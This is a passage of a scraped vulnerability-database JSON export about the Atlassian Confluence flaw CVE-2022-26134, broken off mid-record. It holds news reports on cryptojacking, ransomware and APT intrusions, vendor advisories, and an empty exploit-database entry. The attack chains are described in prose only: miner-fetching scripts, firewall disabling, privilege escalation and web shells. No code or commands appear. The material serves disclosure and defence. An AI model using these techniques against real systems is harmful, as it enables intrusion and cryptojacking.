"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgNDB_6urGQ6KJEXanQt_pnHjch23bL6gkveY_rOhDjbe4aoM3fY-HCttsNtRUZDqHuVy9mNU18TLb4dYkj4PS1k95YfJlM8CL-hT9QNezW6GwsBeDapBrHrXEriDxJIeTtZI57ZQvwAS_Tic8ecD0wm8qgF6Aq2T-VPvXYXxJNg8SREGCGZlwHdhzZ/s728-e100/malware.jpg>)\n\nA now-patched critical security flaw affecting Atlassian Confluence Server that came to light a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.\n\n\"If left unremedied and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as a complete domain takeover of the infrastructure and the deployment information stealers, remote access trojans (RATs), and ransomware,\" Trend Micro threat researcher Sunil Bharti [said](<https://www.trendmicro.com/en_us/research/22/i/atlassian-confluence-vulnerability-cve-2022-26134-abused-for-cryptocurrency-mining-other-malware.html>) in a report.\n\nThe issue, tracked as [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) (CVSS score: 9.8), was addressed by the Australian software company in June 2022.\n\nIn one of the infection chains observed by the cybersecurity company, the flaw was leveraged to download and run a shell script (\"ro.sh\") on the victim's machine, which, in turn, fetched a second shell script (\"ap.sh\").\n\nThe malicious code is designed to update the [PATH variable](<https://www.digitalocean.com/community/tutorials/how-to-view-and-update-the-linux-path-environment-variable>) to include additional paths such as \"/tmp\", download the cURL utility (if not already present) from a remote server, disable iptables firewall, abuse the [PwnKit flaw](<https://thehackernews.com/2022/09/new-stealthy-shikitega-malware.html>) (CVE-2021-4034) to gain root privileges, and ultimately deploy the hezb crypto miner.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgJUBIiTQNhHQT7F4futeVMM2_cBIIPj-5ZrZyhn0F2LxqA0mpy-CsPoin32NArWubqXSZLDYTS1ZIeDtR_X8GEGlXvkNeXx4aL2VaogujG-5IWSExG-3DZArq7MNuOLv1yLywHo1bUv6GdjWbgkDMoArlCUKyC2Er-EgIo1UmgacIcGat8-xAz6eag/s728-e100/curl.jpg>)\n\nLike other cryptojacking attacks, the shell script also terminates other competing coin miners, disables cloud service provider agents from Alibaba and Tencent, before carrying out lateral movement via SSH.\n\nThe findings mirror similar exploitation attempts previously disclosed by [Lacework](<https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/>), [Microsoft, Sophos](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>), and [Akamai](<https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations>) in June.\n\nLacework's analysis further shows that the command-and-control (C2) server used to retrieve the cURL software as well as the hezb miner also distributed a Golang-based ELF binary named \"[kik](<https://www.virustotal.com/gui/file/f13e48658426307d9d1434b50fa0493f566ed1f31d6e88bb4ac2ae12ec31ef1f/>)\" that enables the malware to kill processes of interest.\n\nUsers are advised to prioritize patching the flaw as it could be abused by threat actors for other nefarious purposes.\n\n\"Attackers could take advantage of injecting their own code for interpretation and gain access to the Confluence domain being targeted, as well as conduct attacks ranging from controlling the server for subsequent malicious activities to damaging the infrastructure itself,\" Bharti said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-22T06:17:00", "type": "thn", "title": "Hackers Targeting Unpatched Atlassian Confluence Servers to Deploy Crypto Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4034", "CVE-2022-26134"], "modified": "2022-09-22T06:17:56", "id": "THN:E0B486DA1C8CE77D0DF337E8307100D6", "href": "https://thehackernews.com/2022/09/hackers-targeting-unpatched-atlassian.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-18T05:57:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj9rIpLd7Wt8S6XBYbfSyi_LxY3hVen8bxDxWgv56ywl84WByL1Zl26yIu_oQ18uh4gvIi8vulmy9q1SZTMxCmqhEiWx0sm82_GHXfs821huyPVdY3i9HR5j_Dk6uxz27udcCKd-Tl7Z1edq42KHthx8Ln0XuGeTqNQ5nDnXn7z5jvyBqljfIiqhIVu/s728-e100/ransomware.jpg>)\n\nA recently patched [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.\n\nIn at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a [crypto miner](<https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/>) called z0miner on victim networks.\n\nThe bug ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>), CVSS score: 9.8), which was [patched](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way of remote code execution (RCE) on affected installations of the collaboration suite. All supported versions of Confluence Server and Data Center are affected.\n\nOther notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called [pwnkit](<https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html>), and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.\n\n\"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage,\" Andrew Brandt, principal security researcher at Sophos, [said](<https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj4ylTTjRkYLtYQCSXoVz8gUgRgTa98lR7XaqcG9UbybTcDEi9J5hfotnq_Gutzoj81P5XHccmBjiW9E7KZlw5edBNyVl0N0zwIwuyQGM4A95z1ZdyCtPLIHlvFzE_XXxyZJjC55Sp3sPQrsczwhlKexPSQGqBrt0qHXhWsFMoMEcBZXvs-OTYPTLet/s728-e100/code.jpg>)\n\nThe disclosure overlaps with similar warnings from Microsoft, which [revealed](<https://twitter.com/MsftSecIntel/status/1535417776290111489>) last week that \"multiple adversaries and nation-state actors, including [DEV-0401](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0401>) and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134.\"\n\nDEV-0401, described by Microsoft as a \"China-based lone wolf turned LockBit 2.0 affiliate,\" has also been previously linked to ransomware deployments targeting internet-facing systems running VMWare Horizon ([Log4Shell](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>)), Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>)), and on-premises Exchange servers ([ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>)).\n\nThe development is emblematic of an [ongoing trend](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-18T04:11:00", "type": "thn", "title": "Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-18T04:11:14", "id": "THN:0488E447E08622B0366A0332F848212D", "href": "https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-16T15:26:53", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1sRBo_ZY7HgvKOAmX48Fm2WVmdgzaxlpLKjWJdIbcDmSPoMhKNRnvoEzs1CeLQfriVUkngqRhLj6-9awHtv_DcqbKgRbmXo_M_03xicrkKz34GxB6Z68bL51GfJszPQZSm7wdORW1UR-5UcTEgmW2YZ3RvbgUdobA9TKfRbeoXpG1vtvq1S-yeEcf/s728-e100/crypto-mining.jpg>)\n\nMalicious actors such as Kinsing are taking advantage of both recently disclosed and older security flaws in Oracle WebLogic Server to deliver cryptocurrency-mining malware.\n\nCybersecurity company Trend Micro said it [found](<https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html>) the financially-motivated group leveraging the vulnerability to drop Python scripts with capabilities to disable operating system (OS) security features such as Security-Enhanced Linux ([SELinux](<https://www.redhat.com/en/topics/linux/what-is-selinux>)), and others.\n\nThe operators behind the [Kinsing malware](<https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces>) have a history of scanning for vulnerable servers to co-opt them into a botnet, including that of [Redis](<https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html>), [SaltStack](<https://redcanary.com/blog/kinsing-malware-citrix-saltstack/>), [Log4Shell](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>), [Spring4Shell](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>), and the Atlassian Confluence flaw ([CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>)).\n\nThe Kinsing actors have also been involved in campaigns against container environments via [misconfigured open Docker Daemon API ports](<https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability>) to launch a crypto miner and subsequently spread the malware to other containers and hosts.\n\nThe latest wave of attacks entails the actor weaponizing [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (CVSS score: 9.8), a two-year-old remote code execution (RCE) bug, against unpatched servers to seize control of the server and drop malicious payloads.\n\nIt's worth noting that the vulnerability has been [exploited in the past](<https://thehackernews.com/2020/12/multiple-botnets-exploiting-critical.html>) by multiple botnets to distribute Monero miners and the Tsunami backdoor on infected Linux systems. \n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh-utvgKxe36MyxmW2adubFVWxVKr-1Z4nJnB9nCLoIz72PJGF2D8Ti92uYdI0q1Y-KNK6paKazaUlHWRQZziPwY5119ANOJMXqaoGe4zOQOvqeEL1KkDD0Ed6TPx0FMjstH-f-8Sk0X--OysqaQnanHwm4INx3STYgUBwVWAo4Jzx5tnTWbKUt7EO4/s728-e100/hack.jpg>)\n\nSuccessful exploitation of the flaw was succeeded by the deployment of a shell script that's responsible for a series of actions: Removing the [/var/log/syslog](<https://help.ubuntu.com/community/LinuxLogFiles>) system log, turning off security features and cloud service agents from Alibaba and Tencent, and killing competing miner processes.\n\nThe shell script then proceeds to download the Kinsing malware from a remote server, while also taking steps to ensure persistence by means of cron job.\n\n\"The successful exploitation of this vulnerability can lead to RCE, which can allow attackers to perform a plethora of malicious activities on affected systems,\" Trend Micro said. \"This can range from malware execution [...] to theft of critical data, and even complete control of a compromised machine.\"\n\n## **TeamTNT actors make a comeback with new attacks**\n\nThe development comes as researchers from Aqua Security identified three new attacks linked to another \"vibrant\" cryptojacking group called TeamTNT, which voluntarily shut shop in November 2021.\n\n\"TeamTNT has been scanning for a misconfigured Docker Daemon and deploying alpine, a vanilla container image, with a command line to download a shell script (k.sh) to a C2 server,\" Aqua Security researcher Assaf Morag [said](<https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt>).\n\nWhat's notable about the attack chain is that it appears to be designed to break [SECP256K1 encryption](<https://en.bitcoin.it/wiki/Secp256k1>), which, if successful, could give the actor the ability to calculate the keys to any cryptocurrency wallet. Put differently, the idea is to leverage the high but illegal computational power of its targets to run the ECDLP solver and get the key.\n\nTwo other attacks mounted by the group entail the exploitation of [exposed Redis servers](<https://blog.aquasec.com/container-attacks-on-redis-servers>) and misconfigured Docker APIs to deploy coin miners and Tsunami binaries.\n\nTeamTNT's targeting of Docker REST APIs has been [well-documented](<https://thehackernews.com/2021/12/ongoing-autom-cryptomining-malware.html>) over the past year. But in an [operational security blunder](<https://www.trendmicro.com/en_us/research/22/i/security-breaks-teamtnts-dockerhub-credentials-leak.html>) spotted by Trend Micro, credentials associated with two of the attacker-controlled DockerHub accounts have been uncovered.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi0IY0nHIYVyoplfjBcUxHe2UQ8HJC-CQsXJZNKOFuXC17C5Qr6a4wRSM0arKFfc-z29j61GI_am83TJutj7s1RlsF0UQx0uq8dvuNfezG7wqD3PYDPqFHBO8m7qopVHCWrgR4GYVjM8c_OlyO6Fl0eUcrIcwH9vV7RwxB2-SpZb-AiOpx65Z7kdB1W/s728-e100/cyber.jpg>)\n\nThe accounts \u2013 alpineos and sandeep078 \u2013 are said to have been used to distribute a variety of malicious payloads like rootkits, Kubernetes exploit kits, credential stealers, XMRig Monero miners, and even the Kinsing malware.\n\n\"The account alpineos was used in exploitation attempts on our honeypots three times, from mid-September to early October 2021, and we tracked the deployments' IP addresses to their location in Germany,\" Trend Micro's Nitesh Surana [said](<https://www.trendmicro.com/en_us/research/22/i/security-breaks-teamtnts-dockerhub-credentials-leak.html>).\n\n\"The threat actors were logged in to their accounts on the DockerHub registry and probably forgot to log out.\" Alternatively, \"the threat actors logged in to their DockerHub account using the credentials of alpineos.\"\n\nTrend Micro said the malicious alpineos image had been downloaded more than 150,000 times, adding it notified Docker about these accounts. \n\nIt's also recommending organizations to configure the exposed REST API with TLS to mitigate adversary-in-the-middle (AiTM) attacks, as well as use credential stores and [helpers](<https://github.com/docker/docker-credential-helpers>) to host user credentials.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-16T10:58:00", "type": "thn", "title": "Hackers Targeting WebLogic Servers and Docker APIs for Mining Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2022-26134"], "modified": "2022-09-16T15:00:46", "id": "THN:FF1CD6F91A87ADD45550F34DE9C8204A", "href": "https://thehackernews.com/2022/09/hackers-targeting-weblogic-servers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-18T03:57:04", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjgpvdXejiTfwIlf3wPHIzsqwrtWGd_UVqF569qifyNIKommhLUjf5dLuF__8BWAVuomoK7Tjv03yLr8nENvhakrn1qW-YxaHhRkYOtDEmW8uq9xYxqTrmWnx4a-valU6Pz2wW9AJDs3n89ygTe8g5wduuCsFDkSwFnxhC6LGVpEIRGHIbakY-7iAww/s728-e100/hackers.jpg>)\n\nA sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack.\n\n\"The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks against the customer's staff,\" Volexity [said](<https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/>) in a report. \"These attacks aimed to further breach cloud-hosted web servers hosting the organization's public-facing websites.\"\n\nThe zero-day flaw in question is tracked as [CVE-2022-1040](<https://thehackernews.com/2022/03/critical-sophos-firewall-rce.html>) (CVSS score: 9.8), and concerns an authentication bypass vulnerability that can be weaponized to execute arbitrary code remotely. It affects Sophos Firewall versions 18.5 MR3 (18.5.3) and earlier.\n\nThe cybersecurity firm, which issued a patch for the flaw on March 25, 2022, noted that it was abused to \"target a small set of specific organizations primarily in the South Asia region\" and that it had notified the affected entities directly.\n\nNow according to Volexity, early evidence of exploitation of the flaw commenced on March 5, 2022, when it detected anomalous network activity originating from an unnamed customer's Sophos Firewall running the then up-to-date version, nearly three weeks before public disclosure of the vulnerability.\n\n\"The attacker was using access to the firewall to conduct man-in-the-middle (MitM) attacks,\" the researchers said. \"The attacker used data collected from these MitM attacks to compromise additional systems outside of the network where the firewall resided.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjfKjGMxU9f1By4kZoaueFeICYJthIRyuvPWTxc8s0q2C7jWNX1Gnw6l06cNevtbWwc-WlR-RqbNxeIsdNPX2peEnO-wx8UlXLZt_DXhDA1SO-PFFO9ZBTJgHRcFERamkXbe2rC2UmykVCY8sMi4uQAmKGhBFdo0cmodi9751cbQW1T4L9-2SdlpXhr/s728-e100/cyber.jpg>)\n\nThe infection sequence post the firewall breach further entailed backdooring a legitimate component of the security software with the [Behinder](<https://github.com/Freakboy/Behinder>) web shell that could be remotely accessed from any URL of the threat actor's choosing.\n\nIt's noteworthy that the Behinder web shell was also leveraged earlier this month by Chinese APT groups in a separate set of intrusions exploiting a zero-day flaw in Atlassian Confluence Server systems ([CVE-2022-26134](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>)).\n\nAdditionally, the attacker is said to have created VPN user accounts to facilitate remote access, before moving on to modify DNS responses for specially targeted websites \u2014 primarily the victim's content management system (CMS) \u2014 with the goal of intercepting user credentials and session cookies.\n\nThe access to session cookies subsequently equipped the malicious party to take control of the WordPress site and install a second web shell dubbed [IceScorpion](<https://zhuanlan.zhihu.com/p/354906657>), with the attacker using it to deploy three open-source implants on the web server, including [PupyRAT](<https://github.com/n1nj4sec/pupy>), [Pantegana](<https://github.com/cassanof/pantegana>), and [Sliver](<https://github.com/BishopFox/sliver>).\n\n\"DriftingCloud is an effective, well equipped, and persistent threat actor targeting [five-poisons](<https://en.wikipedia.org/wiki/Five_Poisons>)-related targets. They are able to develop or purchase zero-day exploits to achieve their goals, tipping the scales in their favor when it comes to gaining entry to target networks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-17T09:39:00", "type": "thn", "title": "Chinese Hackers Exploited Sophos Firewall Zero-Day Flaw to Target South Asian Entity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1040", "CVE-2022-26134"], "modified": "2022-06-18T03:43:31", "id": "THN:1E1F3CC9BEE728A9F18B223FC131E9B1", "href": "https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2022-06-14T17:05:44", "description": "Atlassian has released a security advisory to address a remote code execution vulnerability (CVE-2022-26134) that?s affecting Confluence Server and Data Center products.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:00:00", "type": "akamaiblog", "title": "Akamai Protects Against the Atlassian Confluence 0-Day (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T09:00:00", "id": "AKAMAIBLOG:4A411E7E1CF65A8662ABD43534726FEF", "href": "https://www.akamai.com/blog/security/akamai-protects-against-atlassian-confluence-0-day", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T15:05:44", "description": "The Atlassian Confluence vulnerability is here to stay. See Akamai's research into the stats two weeks after the advisory was released.", "cvss3": {}, "published": "2022-06-28T13:00:00", "type": "akamaiblog", "title": "Akamai?s Observations of Confluence Zero Day (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-28T13:00:00", "id": "AKAMAIBLOG:99D943E3269E3EABFC3348509D099BA8", "href": "https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations", "cvss": {"score": 0.0, "vector": "NONE"}}], "atlassian": [{"lastseen": "2022-09-19T06:46:30", "description": "This is a duplicate of https://jira.atlassian.com/browse/CONFSERVER-79016\r\n\r\nSee the link above for more information on the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T03:36:35", "type": "atlassian", "title": "Unauthenticated remote code execution vulnerability via OGNL template injection - Duplicate", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-19T03:58:19", "id": "CONFSERVER-79000", "href": "https://jira.atlassian.com/browse/CONFSERVER-79000", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-23T19:47:14", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\u00a0\r\nThe affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\r\n\u00a0\r\nFor more information, see https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T20:08:07", "type": "atlassian", "title": "Remote code execution via OGNL injection in Confluence Server & Data Center - CVE-2022-26134", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-23T17:17:45", "id": "CONFSERVER-79016", "href": "https://jira.atlassian.com/browse/CONFSERVER-79016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2022-06-20T02:28:51", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T00:00:00", "type": "zdt", "title": "Confluence Data Center 7.18.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 